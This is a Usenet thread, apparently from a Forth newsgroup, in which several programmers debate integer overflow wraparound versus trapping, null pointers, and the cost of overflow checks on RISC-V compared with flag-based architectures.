Post by Paul Rubin
#1 on TIOBE is
Python, which uses arbitrary precision as the native integer type. That
slows arithmetic down but it mostly eliminates the overflow problem.

Don't you also need to first check that both arguments are small
integers ?

Anton Ertl

2024-03-09 17:01:30 UTC

Post by Spiros Bousbouras
On Sat, 09 Mar 2024 11:30:56 GMT

Post by Anton Ertl
If implemented well, the slowdown is small in the common case (small
integers): E.g., on AMD64 an add, sub, or imul instruction just needs
to be followed by a jo which in the usual case is not taken and very
predictable.

Don't you also need to first check that both arguments are small
integers ?

Yes, at some point. If the same value is used several times in a
piece of code, there is only one check needed before the first use; if
a subsequent use is not dominated by the first use, you only need
another check on those paths that bypass the first check, as in
partial redundancy elimination, resulting in one check on any path
that reaches a use of the value.

- anton

Paul Rubin

2024-03-10 04:18:34 UTC

It might be worse for RISC V. Either way though, you need either boxed
integers or tag bits.

Post by Anton Ertl
Python (particularly CPython), however, does not seem to have gone for
efficient implementation;

CPython's implementation is not very good, but there is or was a gmpy
module that let you use GMP for fast bignum arithmetic. I remember in
the Python 2.2 era it was 3x or 4x faster than CPython bignums. But, I
think it has since fallen into non-maintenance and bit rot.

Post by Anton Ertl
I don't know what they do for arbitrarily large integers, but the
inner interpreter was pretty monstrous last I looked.

CPython has a fairly straightforward bytecode interpreter.

Post by Anton Ertl
But integer overflow is orthogonal to memory safety.
There are many people who claim that wrapping behaviour for integer
overflow is a problem.

It has a problem because it's wrong! Of course it's deterministic
instead of being UB, and that makes some people feel better, but making
2+2=5 is also deterministic yet wrong. At least with UB, the
implementation can have a setting to do the right thing and trap the
overflow, instead of being mandated to quietly give wrong results.

Imagine x is a 50 element array and for whatever reason you try to
update x[60]. So the implementation might clobber 10 elements past the
end of the array (bad), or it can signal an error (the only thing that
makes sense), or in a feat of Java-like brilliance it might alias x[60]
to x[10] since 60 is 10 mod 50. That seems completely silly to me as a
default behaviour. Integer overflow wraparound is more of the same.

Yes there are situations like circular buffers where you might want that
wraparound, just like there are situations like hash functions where you
want machine word wraparound, but those are special enough to call for
explicit declarations.

Post by Anton Ertl
Java defines the basic types int and long to perform wraparound on
overflow,

Yes, a mistake IMHO. The one language that I know of that gets this
right is Ada. The default behavior is signal on overflow, but you can
specify wraparound (with any modulus you wish) if that is what your
application wants. If your modulus happens to be 2**32 or whatever, the
compiler recognizes this and generates the efficient machine code you
would expect.

minforth

2024-03-10 08:15:48 UTC

Excellent summary.

Anton Ertl

2024-03-10 08:29:13 UTC

It might be worse for RISC V.

It is. That's a failure of RISC-V.

Post by Anton Ertl
I don't know what they do for arbitrarily large integers, but the
inner interpreter was pretty monstrous last I looked.

CPython has a fairly straightforward bytecode interpreter.

When I last looked, the inner interpreter dispatch was huge, covering
the screen (maybe 50-100 lines), with lots of special cases for
various things.

Post by Anton Ertl
But integer overflow is orthogonal to memory safety.
There are many people who claim that wrapping behaviour for integer
overflow is a problem.

It has a problem because it's wrong! Of course it's deterministic
instead of being UB, and that makes some people feel better, but making
2+2=5 is also deterministic yet wrong.

In Java 2+2 gives 4. What do you hope to gain by putting up straw men?

Post by Paul Rubin
Imagine x is a 50 element array and for whatever reason you try to
update x[60].

That is a memory-safety issue, and what Java gives you in the case is
something like throwing an ArrayIndexOutOfBoundsException.

Post by Paul Rubin
So the implementation might clobber 10 elements past the
end of the array (bad), or it can signal an error (the only thing that
makes sense), or in a feat of Java-like brilliance it might alias x[60]
to x[10] since 60 is 10 mod 50.

Java does not do that. What do you hope to gain by putting up straw
men?

Post by Anton Ertl
Java defines the basic types int and long to perform wraparound on
overflow,

Yes, a mistake IMHO.

You just have no arguments but "It's wrong!" and straw men to back up
your opinion.

- anton

Paul Rubin

2024-03-10 09:56:08 UTC

Post by Paul Rubin
2+2=5 is also deterministic yet wrong.

In Java 2+2 gives 4. What do you hope to gain by putting up straw men?

2+2=5 is obviously wrong and Java doesn't go quite that far. Java
instead insists that you can add two positive integers and get a
negative one. That's wrong the same way that 2+2=5 is. It just doesn't
mess up actual programs as often, because the numbers involved are
bigger.

Post by Anton Ertl
You just have no arguments but "It's wrong!" and straw men to back up
your opinion.

In what world can it be right for n to be a positive integer and n+1 to
be a negative integer? That's not how integers work.

Tony Hoare in 2009 said about null pointers:

I call it my billion-dollar mistake. It was the invention of the
null reference in 1965. At that time, I was designing the first
comprehensive type system for references in an object oriented
language (ALGOL W). My goal was to ensure that all use of references
should be absolutely safe, with checking performed automatically by
the compiler. But I couldn't resist the temptation to put in a null
reference, simply because it was so easy to implement. This has led
to innumerable errors, vulnerabilities, and system crashes, which
have probably caused a billion dollars of pain and damage in the
last forty years.

That is, C and other such languages have null pointers because they
corresponded so conveniently to machine operations that the language
designers couldn't resist including them. Java-style wraparound
arithmetic is more of the same. A bug magnet, but irresistibly
convenient for the implementers because of its isomorphism to machine
arithmetic.

Java also has null pointers, another possible mistake. Ada doesn't have
them, nor does Python etc. C++ has them because of its C heritage and
the need to support legacy code, but I believe that in "modern" C++
style you're supposed to use references instead of pointers, so you
can't have a null or uninitialized one.

Hans Bezemer

2024-03-10 15:37:03 UTC

Post by Paul Rubin
2+2=5 is obviously wrong and Java doesn't go quite that far. Java
instead insists that you can add two positive integers and get a
negative one. That's wrong the same way that 2+2=5 is. It just doesn't
mess up actual programs as often, because the numbers involved are
bigger.

Any number representation has its problems - since there is no way to
properly represent infinite precision. If you tried to get an arbitrary
precision system let represent PI properly, it would blow that system -
no matter how much hardware you threw at it. And yes, exceeding that
precision will have side effects. Deal with it. The current binary
representation was designed for raw speed - and it shows. That's how
things are. Exclamations like "BUT IT'S WRONG" may be correct, but
without a true alternative it's not gonna change much.

Post by Paul Rubin
That is, C and other such languages have null pointers because they
corresponded so conveniently to machine operations that the language
designers couldn't resist including them. Java-style wraparound
arithmetic is more of the same. A bug magnet, but irresistibly
convenient for the implementers because of its isomorphism to machine
arithmetic.

That's exactly the attitude that some people have down here. Just squat
the problem without properly thinking it through. "Yeah, lets limit
cells to 16 bits". "Yeah, lets LOOP 'fall through' and examine every
single integer possible before stopping", "Yeah, lets introduce ?DO.
It's not gonna solve much, but it looks good", "Yeah, lets set 1 CHARS
to a single address unit", "Yeah, lets abuse the weird behavior of MOVE
when it overlaps and make it into a feature, because it's so neat".

It's the kind of design decision making that is sold as "pragmatic", but
actually is lazy and sloppy.

In 4tH, I originally started off with "0" as a NULL pointer. I quickly
found out that 80000000h (on the 32bit machine) had special properties,
which didn't make it suitable for a lot of operations. So, this became
the "error" value. As a signed number, it isn't a valid pointer anyway.
So that slowly, but surely became 4tHs error value. I haven't regretted
that since it works out a lot better than a number like "0".

Post by Paul Rubin
Java also has null pointers, another possible mistake. Ada doesn't have
them, nor does Python etc. C++ has them because of its C heritage and
the need to support legacy code, but I believe that in "modern" C++
style you're supposed to use references instead of pointers, so you
can't have a null or uninitialized one.

It depends a lot on how error checking is handled. You could return it
like "errno" or perror(). You could throw an exception. You could return
some special value - like a NULL pointer.

Personally, I think it's kind of an overkill to throw an exception when
your substring isn't found (like in INSTR()) - but it's an interesting
thought. And what about RAII? Yeah, we hide our NULL pointer in a
boolean, so we can throw an exception anyway (sic!). Talking about
"sloppy design":

std::ofstream file("example.txt");
if (!file.is_open()) {
throw std::runtime_error("unable to open file");
}

The point is - every solution has advantages and disadvantages. Sure,
you must inform developers of the disadvantages of a chosen solution.
But you must also have the courage to fix things, gravitating to the
best solution possible. gets() is a good example. I mean, NULL is
already a macro, it shouldn't be difficult to gravitate to a better
value. When programming properly, it shouldn't even break much code -
unless you thought:

if (!fopen("myfile.txt", "r")) { .. }

was a great idea.

Hans Bezemer

Paul Rubin

2024-03-10 20:03:04 UTC

Post by Hans Bezemer
Any number representation has its problems - since there is no way to
properly represent infinite precision.

That's exactly the idea here. If the computer runs out of memory in a
bignum system, that is unquestionably an error condition. In a low
level system where the representation limit is fitting in a machine word
rather than having the whole computer memory available, the same error
condition occurs if the machine word doesn't have enough bits.

Post by Hans Bezemer
Exclamations like "BUT IT'S WRONG" may be correct, but without a true
alternative it's not gonna change much.

The true alternative is to treat overflow as an error condition, as
Ada does, and as languages with bignums do, and as even C does (C at
least permits the implementation to do the right thing, although it
doesn't require it to).

Post by Hans Bezemer
It depends a lot on how error checking is handled. You could return it
like "errno" or perror(). You could throw an exception. You could
return some special value - like a NULL pointer.

You could also use something like std::optional so that static analysis
can notify you if you don't handle the error case. Haskell in principle
does even better, letting type inference determine the error handling
strategy:

https://blogs.perl.org/users/ovid/2010/08/what-to-know-before-debating-type-systems.html

See the section "Fallacy: Static types imply longer code".

Post by Hans Bezemer
std::ofstream file("example.txt");
if (!file.is_open()) {

I have the impression that this is legacy design leaking through, but
I'm not a C++ expert by any means. See also the term "boolean blindness".

Post by Hans Bezemer
I mean, NULL is already a macro, it shouldn't be difficult to
gravitate to a better value.

The trouble is that the pointer datatype doesn't distinguish NULL from
valid addresses. A static analyzer could have an internal database of
functions whose return values should be checked against NULL, but it's
better to make it explicit in the datatype.

dxf

2024-03-11 05:26:11 UTC

...

At this point in time there's no way ?DO can be wrested away from forthers.
They'll point to all the memory errors it has prevented :)

a***@spenarnc.xs4all.nl

2024-03-11 10:15:56 UTC

It might be worse for RISC V.

It is. That's a failure of RISC-V.

As far as I can tell it was a design choice for DEC Alpha and RISC-V.
Apparently flags are detrimental to parallelism.

You can't call that a failure because you don't like it.
Groetjes Albert

Anton Ertl

2024-03-11 17:40:20 UTC

Post by a***@spenarnc.xs4all.nl

It might be worse for RISC V.

It is. That's a failure of RISC-V.

As far as I can tell it was a design choice for DEC Alpha and RISC-V.

And MIPS.

Post by a***@spenarnc.xs4all.nl
Apparently flags are detrimental to parallelism.

Reality check: No MIPS, Alpha, or RISC-V ever has had as much
instruction-level parallelism as contemporaneous CPUs for
architectures with flags, so flags are obviously not detrimental to
instruction-level parallelism.

Look at
<http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps>: The
dashed orange line near the bottom is U74, a RISC-V implementation.
The other lines are all for CPU cores with flags.

If you want to do several parallel multi-precision additions, say, if
you want a multi-precision addition a+b+c+d, having one (ARM A64) or
two (AMD64 with ADX) carry flags does indeed limit the parallelism,
but the MIPS/Alpha/RISC-V answer is to replace one ADCX/ADOX
instruction (one cycle latency) with five instructions with typically
three cycles of latency.

On AMD64 with ADX, a 6400-bit addition of a+b+c+d can be split into
two chains: t=a+b+c and t+d; this has a total latency of about 200
cycles (actually OoO execution can reduce this somewhat by overlapping
the two chains to a certain extent), while the MIPS/Alpha/RISC-V
approach takes 300 cycles of latency with no chance of additional
overlap within that computation.

You will need >6 parallel multi-precision additions before the two
carry flags of AMD64 with ADX are theoretically more limiting than the
MIPS/Alpha/RISC-V approach. And to be practically more limiting, the
RISC-V implementation needs to be extremely wide (>36 instructions per
cycle) and the precision must be extremely high (to eliminate overlap
between chains as an issue).

Post by a***@spenarnc.xs4all.nl
You can't call that a failure because you don't like it.

The correct english term is that it's the *fault* of RISC-V. They
took a deliberate decision to need more instructions for implementing
overflow checks than other architectures, so it's their
responsibility, and for those who want to use big integers (or who
want to trap on signed overflow), their fault.

For an alternative to the RISC-V approach that is not as limiting as
the ARM A64 and AMD64 approaches, read:

http://www.complang.tuwien.ac.at/anton/tmp/carry.pdf

(not published yet)

- anton

mhx

2024-03-11 18:50:36 UTC

No / not yet?
"The requested URL /anton/tmp/opt-ipc-uarch.eps : was not found on this server."

Anton Ertl

2024-03-11 20:51:46 UTC

Post by mhx
No / not yet?
"The requested URL /anton/tmp/opt-ipc-uarch.eps : was not found on this server."

Works for me:

wget http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps
--2024-03-11 21:49:20-- http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps
Resolving www.complang.tuwien.ac.at (www.complang.tuwien.ac.at)... 128.130.173.64
Connecting to www.complang.tuwien.ac.at (www.complang.tuwien.ac.at)|128.130.173.64|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2255987 (2.2M) [application/postscript]
Saving to: âopt-ipc-uarch.epsâ

opt-ipc-uarch.eps 100%[===================>] 2.15M 8.38MB/s in 0.3s

- anton

dxf

2024-03-11 01:00:12 UTC

Post by Paul Rubin
...
Yes there are situations like circular buffers where you might want that
wraparound,

Want? It won't result in data being overwritten? Risk cannot be eliminated
- only managed. To manage risk one must be familiar with it - not handing
it over to a higher power.

Paul Rubin

2024-03-04 20:23:04 UTC